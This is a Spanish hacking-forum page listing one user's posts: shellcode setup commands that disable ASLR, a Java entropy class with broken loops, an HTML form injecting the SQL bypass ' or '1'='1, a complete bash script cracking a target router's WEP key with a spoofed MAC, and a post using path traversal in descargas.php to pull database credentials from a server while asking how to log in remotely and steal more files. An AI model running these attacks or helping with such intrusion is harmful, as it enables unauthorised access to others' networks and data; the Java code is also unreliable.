elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Hacking / Shellcoding 4 dummies en: 8 Mayo 2011, 18:35 pm
He compartido esta info con todos vosotros en mi blog pero me gustaría hacerlo aquí tambien en la comunidad ya que gracias a esta info he codeado mi primera shellcode, muy básica, pero a veces los tutoriales son algo enrevesados y uno se pierde por la mitad. Así que espero que os sirva de ayuda a los que están interesados en aprender.

Tutoriales muy muy claros:
http://securityetalii.es/2010/04/14/exploitation-shellcodes-en-linux-i/
http://securityetalii.es/2010/04/21/exploitation-shellcodes-en-linux-ii/
http://securityetalii.es/2010/04/05/exploitation-evadiendo-nx/


Compilar un Programita en ensamblador:
Código
  1. nasm -f elf $ShellcodeEnASM


Crea el binario del código compilado. (con el archivo.o generado anteriormente)
Código
  1. ld archivo.o -o sc


Quitar la protección del stack, para que sea ejecutable. (Sí el programita ld tambien puede hacerlo)
Código
  1. sudo execstack -s sc $ShellcodeEjecutable


Desensamblar nuestro ejecutable
Código
  1. objdump -d $ShellcodeEjecutable


Desactivar core dump:
Código
  1. ulimit -c unlimited


Desactivar ALSR: (por defecto está puesto a 2, nosotros lo ponemos a 0)
Código
  1. echo 0 > /proc/sys/kernel/randomize_va_space

Bueno.. con esto ya es suficiente para empezar. Si teneis ganas de aprender estoy seguro que no os vais a perder en el camino pero recordad que a programar se aprende programando.
La shellcode que se explica en los tutoriales no es la única solución ni la mejor para lanzar una shell.

Os animo a visitar en shellstorm las shellcodes de Sagrini (seguro que ya lo conoceis todos) y Kernel_Panic para lanzar el /bin/sh:
http://shell-storm.org/shellcode/shellcode-linux.php

Tambien os animo a utilizar una máquina virtual para codear vuestras shellcodes. A mi me resulta mas cómodo y no me tengo que preocupar de los cambios que le hago al sistema operativo.
2  Seguridad Informática / Hacking / No cON Name (Videos Conferencia) en: 30 Diciembre 2010, 13:11 pm

Conferencia sobre seguridad/inseguridad informática en Barcelona.
Disponibles online los videos y papers de las siguientes ponencias:

    * HTC Nand dumping for forensics purposes - Pau Oliva
    * Aspectos organizativos ligados a la seguridad de la información - Joan Ayerbe Font
    * 802.1X y 802.11i – La única seguridad real en Red - Yago Fernández Hansen
    * “Que vienen los Zombis” - Pedro Sánchez
    * Nuking and defending SCADA networks - Alexis Porros y Silvia Villanueva
    * IP Fragmentation Overlapping - Jose Selvi
    * Reversing for goods: fixing security vulnerabilities in binaries - Sergi Alvarez i Capilla (pancake)
    * Development of security-critical embedded systems - Anonymous
    * SMSspoofing: fundamentos, vectores de ataque y salvaguardas - Julián Vilas Díaz
    * Resolución de concursos de la No cON Name 2010 - Alejandro Ramos y Francisco Alonso

Enlace a los videos:
http://noconname.org/congreso.html#videos

Que los disfruteis con salud  ;D
3  Programación / Java / calcula entropía archivo en: 8 Diciembre 2010, 23:27 pm
Estos días me puse a escribir una clase en java para analizar la entropía de un archivo, todo esto con una escasa (casi nula) idea de estadística. Y nada mas.. aquí está el código.
Si encontrais algun error se agradecen sugerencias y críticas. Sobre todo en el método calculaEntropia, porque al no tener ni idea de estadística puede hacer cualquier cosa.

Código
  1. import java.io.*;
  2. import java.util.*;
  3.  
  4. public class analizaEntropia
  5. {
  6.   private char alfabeto[]; //array de caracteres que almacena el alfabeto.
  7.   private int repAlfabeto[]; //numero de veces que se repite cada caracter.
  8.   private int tamAlfabeto=255; //tamaño del alfabeto que vamos a usar.
  9.   private int tamTextoCifrado=0; //tamaño en caracteres del archivo.
  10.   private float entropia[]; //array de entropías.
  11.  
  12.   public analizaEntropia()
  13.   {
  14.       //Produce: Un alfabeto con sus respectivas frecuencias.
  15.  
  16.       for (int i=0; i<=tamAlfabeto; i++)
  17.       {
  18.           alfabeto[i]=AsciiDecToChar(i);
  19.       }
  20.  
  21.       for (int i=0; i<=tamAlfabeto; i++)
  22.       {
  23.           repAlfabeto[i]=0;
  24.       }
  25.  
  26.       for (int i=0; i<=tamAlfabeto; i++)
  27.       {
  28.           entropia[i]=0;
  29.       }
  30.   }
  31.  
  32.   public analizaEntropia(int tamAlf)
  33.   {
  34.       //Produce: Un alfabeto con sus respectivas frecuencias.
  35.  
  36.       tamAlfabeto=tamAlf;
  37.  
  38.       for (int i=0; i<=tamAlfabeto; i++)
  39.       {
  40.           alfabeto[i]=AsciiDecToChar(i);
  41.       }
  42.  
  43.       for (int i=0; i<=tamAlfabeto; i++)
  44.       {
  45.           repAlfabeto[i]=0;
  46.       }
  47.  
  48.       for (int i=0; i<=tamAlfabeto; i++)
  49.       {
  50.           entropia[i]=0;
  51.       }
  52.   }
  53.  
  54.   public static char AsciiDecToChar(int leido)
  55.   {
  56.       // Método creado por: Grekz, http://grekz.wordpress.com
  57.       // Produce: el caracter ascii asociado a dicho entero.
  58.       return (char)leido;
  59.   }
  60.  
  61.   public static int contarOcurrencias(String cad, char caracter)
  62.   {
  63.       // Produce: El numero de ocurrencias del caracter en la cadena.
  64.       int i=0;
  65.       int num=cad.indexOf(caracter,0);
  66.  
  67.       while (num!=-1){
  68.           i=i+1;
  69.           num=cad.indexOf(caracter,num);
  70.  
  71.       }
  72.       return i;
  73.   }
  74.  
  75.   public double calculaEntropia(int[] ocurrencias)
  76.   {
  77.       //Asigna a un array la entropía de un texto dadas las ocurrencias y su tamaño.
  78.       //Modifica This
  79.       double entr=0;
  80.       double p=0;
  81.  
  82.       for (int i=0; i==tamAlfabeto; i++)
  83.       {
  84.           p=repAlfabeto[i]/tamTextoCifrado;
  85.           if(p>0)
  86.               entr=entr-p*Math.log(p);
  87.       }
  88.       return entr;
  89.   }
  90.  
  91.   public void analizaFichero(String fichero)
  92.   {
  93.       //Produce: Las frecuencias de un fichero.
  94.       //Modifica: This.
  95.  
  96.       String linea = new String();
  97.       try
  98.       {
  99.           //Definimos el archivo y el buffer para la lectura.
  100.           File archivo = new File (fichero);
  101.           FileReader fr = new FileReader (fichero);
  102.           BufferedReader br = new BufferedReader(fr);
  103.  
  104.           try{
  105.               while ((linea = br.readLine())!=null)
  106.               {
  107.                   for(int i=0; i==linea.length(); i++)
  108.                   {
  109.                           repAlfabeto[i]=(contarOcurrencias(linea,alfabeto[i]));
  110.                   }
  111.               tamTextoCifrado=tamTextoCifrado+linea.length();
  112.               }
  113.           }catch (IOException IOe){
  114.               System.out.println("Error de E/S");
  115.           }
  116.  
  117.       }catch (FileNotFoundException fnfE){
  118.           System.out.println("Archivo no encontrado");
  119.  
  120.       }
  121.   }
  122. }
  123.  
4  Seguridad Informática / Bugs y Exploits / Reportar inyecciones SQL en: 5 Octubre 2010, 23:19 pm
Os dejo un código muy sencillo en html+javascript que he utilizado para reportar inyecciones sql. Sin tener conocimientos de informática a cualquiera que se le haga el reporte puede comprobar la vulnerabilidad.


Código
  1. <script language="javascript">
  2.  
  3. function enviar()
  4. {
  5. document.getElementById('valor1').value = "' or '1'='1"+document.getElementById('valor1').value;
  6. return true;
  7. }
  8.  
  9. </script>
  10.  
  11. Acceder al primer usuario cuyo LOGIN sea:
  12.  
  13. <form method="post" action="http://www.laweb.com/accion" onsubmit="enviar();">
  14. <input name="login" id="valor1" type="text">
  15. <input name="password" value="' or '1'='1" id="valor2" type="hidden">
  16. <input value="Enviar" type="submit">
  17.  
  18. </form>
5  Comunicaciones / Redes / Problemas de redes en: 7 Septiembre 2010, 04:38 am
Necesito solucionar este par de preguntas de redes. Si alguien me puede echar una mano se lo agradecezco.



Citar
Se contrata una línea Frame Relay con CIR de 2Mbps, un intervalo de tiempo de media Tc 1 seg, un Volumen de información en exceso Be de 1Mbit y todo sobre una línea con una capacidad Cf de 20bps. Responda a las 4 cuestiones siguientes:

-Cuanto tardaría en enviarse a través de ese circuito contratada un fichero de 100Kbytes con garantía de entrega.




Saludos
6  Seguridad Informática / Hacking Wireless / Script sencillo para hackear claves WEP funcionando. en: 10 Febrero 2010, 11:21 am
Acabo de realizar un script para Hackear las redes wireles como alternativa al airoscript o similares.
El mío es más sencillo, sin llamadas a métodos. Os lo dejo por aquí:

Código
  1. #! /bin/bash
  2. #Script wifihack por snakingmax.
  3. sudo rm -r /tmp/wifihack/
  4. sudo mkdir /tmp/wifihack/
  5.  
  6. # PASO 0 - ACTIVAR EL DRIVER MONITOR:
  7. sudo airmon-ng stop mon0;
  8. sudo airmon-ng start wlan0;
  9.  
  10. # PASO 0.1 - PONERME UNA MAC FALSA. Fabada mola xD
  11. sudo ifconfig mon0 down;
  12. sudo macchanger --mac=00:FA:BA:DA:CA:BE mon0
  13. sudo ifconfig mon0 up;
  14.  
  15. # PASO 1 - LISTAR LAS WIFIS:
  16. xterm -title "Detectando wifis (paralo cuando quieras)." -e sudo airodump-ng mon0 -w "/tmp/wifihack/wifiList";
  17. cat /tmp/wifihack/wifiList-01.kismet.netxml | grep -e 'essid' -e 'BSSID'  -e 'channel' -e 'encryption' > /tmp/wifihack/wifis |
  18. firefox "/tmp/wifihack/wifis";
  19.  
  20. # Un inciso para preguntar:
  21. j="n";
  22. while test $j != "s"
  23. do
  24. clear;
  25. echo Dime el canal del punto de acceso:
  26. read canal
  27. echo Dime la mac del router del objetivo:
  28. read MAC_OBJETIVO
  29. echo Dime el nombre de la wifi del objetivo:
  30. read NOMBRE_AP
  31. echo "¿Estás seguro de que lo has escrito bien (s/n)?"
  32. read j
  33. done
  34. echo Vamos a empezar con el proceso entonces.
  35.  
  36. # PASO 2 - PONER EL AIRODUMP:
  37. xterm -hold  -title "Pinchando la conexión del objetivo" -e sudo airodump-ng -c $canal -w /tmp/wifihack/captura mon0 &
  38.  
  39. # PASO 3 - HACERSE AMIGO DEL ROUTER DEL OBJETIVO:
  40. # e inyectar algo de tráfico cada 5 segundos.
  41. xterm -hold -title "Me estoy haciendo amigo del router del objetivo" -e "for (( i=0; i<=1000; i++ )) do sudo aireplay-ng -1 0 -a $MAC_OBJETIVO -h 00:FA:BA:DA:CA:BE -e $NOMBRE_AP mon0; sleep 5; done" &
  42.  
  43. # PASO 4 - ESNIFAR ROUTER DEL OBJETIVO:
  44. xterm -hold -title "Almacenando los datos de la conexion pinchada" -e sudo aireplay-ng -3 -b $MAC_OBJETIVO -h 00:FA:BA:DA:CA:BE mon0 &
  45.  
  46. # PASO 5 - OBTENER LA CLAVE A PARTIR DE LO QUE ESNIFAMOS:
  47. xterm -hold -title "Pulsa una tecla para intentar crackear" -e "for (( i=0; i<=1000; i++ )) do read a; sudo aircrack-ng -a 1 -s /tmp/wifihack/captura-01.cap; done"
  48.  

Solamente me gustaría que mostrase mejor el archivo: wifiList-01.kismet.netxml
Ese archivo contiene en formato xml la lista de wifis de todos los canales wifi.

Lo que hice es volcar a un archivo usando grep los datos mas interesantes de las wifis que se guardan en bloques que empiezan con el campo <encriptacion> y terminan con el campo <canal>.

Y después abro ese archivo con firefox, si no lo tenéis instalado podéis abrirlo con kate o similares.

Lo interesante sería que el script filtrase también las etiquetas de xml y mostrase los datos algo mas ordenados  :P

Un saludo y gracias a todos por vuestra ayuda.
7  Seguridad Informática / Nivel Web / Vulnerabilidades en PHP en: 18 Julio 2009, 05:35 am
Hola, estoy intentando acceder a una BD SQL. Espero que podáis ayudarme.
POR PASOS:

Entro a la web y encuentro el archivo "descargas.php" con el siguiente codigo:
<?
        $ruta=$HTTP_GET_VARS['dir'];
   
   $enlace = "../directorio/".$ruta;

   header ("Content-Disposition: attachment; filename=".$ruta."\n\n");
   header ("Content-Type: application/octet-stream");
   header ("Content-Length: ".filesize($enlace));
   readfile($enlace);
?>

Con lo cual haciendo:
http://www.servidor.com/descargas.php?dir=../../conectarsql.php

Consigo bajar el código del archivo conectarsql.php:

<?
$dbh=mysql_connect ("localhost", "usuario", "contraseña") or die ('Imposible conectar porque: ' . mysql_error());
mysql_select_db ("basededatos",$dbh);
?>

Ahora ya tengo la base de datos, el usuario y la contraseña.
Hago un ping a www.servidor.com y ya tengo la IP del servidor también.

Y ahora que tengo todo viene la gran pregunta:
¿Cómo me conecto remotamente a esa B.D.?
¿Es posible el acceso remoto a la base de datos SQL?
¿$enlace = "../directorio/".$ruta; todavía me vale para robar algun archivo más que no sea el passwd ni los logs porque no tengo permiso para ello?

Espero que podáis echarme una mano con esto. Gracias
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines